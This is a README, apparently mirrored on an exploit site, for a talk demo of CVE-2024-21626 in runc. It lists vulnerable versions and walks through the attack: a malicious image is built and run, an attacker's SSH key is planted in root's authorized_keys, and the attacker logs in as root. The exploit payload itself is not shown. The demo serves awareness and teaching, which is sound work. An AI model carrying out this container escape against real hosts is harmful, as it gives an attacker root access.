## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-LAYSAKURA-CVE-2024-21626-DEMO
# CVE-2024-21626-demo
Demo per il LT del Container Runtime Meetup #5.
Scopo: diffondere la consapevolezza del pericolo di attacco secondo le informazioni pubbliche; l'abuso è severamente vietato.
## Slides
Container Runtime Meetup #5 〜Quella immagine, ti fidi davvero?〜 Ottenere la root dell'host con CVE-2024-21626
## Login su victim-server
Macchina registrata come `victim-server` nella ssh_config del laptop per la demo.
root@kitploit:~
ssh victim-server
Informazioni sulla versione come prerequisito per essere vittima dell'attacco:
root@kitploit:~
ubuntu@victim-server:$ docker --version
Docker version 20.10.25+dfsg1, build b82b9f3
ubuntu@victim-server:$ runc --version
runc version 1.1.10+ds1
commit: 1.1.10+ds1-1
spec: 1.1.0
go: go1.21.3
libseccomp: 2.5.4
## Login su attacker-server
Analogamente
root@kitploit:~
ssh attacker-server
## Scenario
### 1\. [victim-server] Recupero, build ed esecuzione accidentali di un'immagine Docker maliziosa
root@kitploit:~
ubuntu@victim-server:~$ git clone some-email@example.com:laysakura/CVE-2024-21626-demo.git
ubuntu@victim-server:~$ cd CVE-2024-21626-demo/
ubuntu@victim-server:~/CVE-2024-21626-demo$ docker build -t myimage .
ubuntu@victim-server:~/CVE-2024-21626-demo$ docker run -it myimage
### 2\. [victim-server] `/root/.ssh/authorized_keys` viene sovrascritto con la chiave pubblica dell'attaccante, senza che ce ne si accorga
Qui non si fa nulla perché non è intenzionale, ma si mostrano i comandi per verificare la situazione.
root@kitploit:~
ubuntu@victim-server:~$ sudo cat /root/.ssh/authorized_keys
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKPHHGSytV6bL1ryaEKE9XNWN23piXdzsI3Rzxe20IF6 ubuntu@attacker-server
### 3\. [attacker-server] Login come root su victim-server
root@kitploit:~
attacker@attacker-server:~$ ssh -i .ssh/id_ed25519 root@victim-server
root@victim-server:~# id
uid=0(root) gid=0(root) groups=0(root)
## References
* https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv
* https://github.com/NitroCao/CVE-2024-21626